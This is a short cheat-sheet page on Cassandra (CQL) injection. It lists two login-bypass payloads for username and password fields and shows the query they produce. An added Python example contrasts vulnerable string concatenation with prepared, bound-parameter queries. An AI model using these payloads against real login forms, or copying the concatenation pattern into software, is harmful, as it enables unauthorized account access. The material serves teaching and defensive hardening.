Cassandra Injection

Apache Cassandra is a free and open-source, distributed, wide-column-store NoSQL database management system.

Cassandra comment

  /* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

  username: admin' ALLOW FILTERING; %00
  password: ANY

Login Bypass 1

  username: admin'/*
  password: */and pass>'

With these inputs, the resulting CQL query looks like this:

  SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

Example from EternalNoob: https://hack2learn.pw/cassandra/login.php
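The following added example (not code from the original page or from the linked login form) shows why the "Login Bypass 1" values change the query when user input is concatenated into CQL text, next to the bound-parameter form that keeps them as data. The function names and `RecordingSession` are hypothetical; `session` is assumed to expose `prepare()`/`execute()` in the style of the DataStax Python driver.

```python
import re

# Constructed inputs: the "Login Bypass 1" values listed above.
USERNAME = "admin'/*"
PASSWORD = "*/and pass>'"

def build_query_concat(username, password):
    """Vulnerable pattern: user input is spliced into the CQL text."""
    return ("SELECT * FROM users WHERE user = '" + username +
            "' AND pass = '" + password + "' ALLOW FILTERING;")

def strip_block_comments(cql):
    """Drop /* ... */ spans to show the statement left for the parser.
    Naive on purpose: it does not track string literals."""
    return re.sub(r"/\*.*?\*/", "", cql, flags=re.S)

# Constant statement text; values travel separately as bound parameters.
PARAM_CQL = "SELECT * FROM users WHERE user = ? AND pass = ? ALLOW FILTERING"

def login_prepared(session, username, password):
    """Hardened pattern: prepare once, bind the inputs as values.
    `session` is an assumed driver-style object; no driver is imported."""
    stmt = session.prepare(PARAM_CQL)
    return session.execute(stmt, [username, password])

class RecordingSession:
    """Hypothetical stand-in for a driver session; records what it is given."""
    def __init__(self):
        self.prepared, self.bound = None, None
    def prepare(self, cql):
        self.prepared = cql
        return cql
    def execute(self, stmt, params):
        self.bound = list(params)
        return []  # no rows: the payload strings match no stored user

def demo():
    concat = build_query_concat(USERNAME, PASSWORD)
    effective = strip_block_comments(concat)
    session = RecordingSession()
    login_prepared(session, USERNAME, PASSWORD)
    return concat, effective, session.prepared, session.bound

if __name__ == "__main__":
    for item in demo():
        print(item)
```

In the concatenated form the password equality test ends up inside the comment and is replaced by a `pass>''` comparison; in the prepared form the statement text never changes and the quote and comment characters are only ever compared as literal column values.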
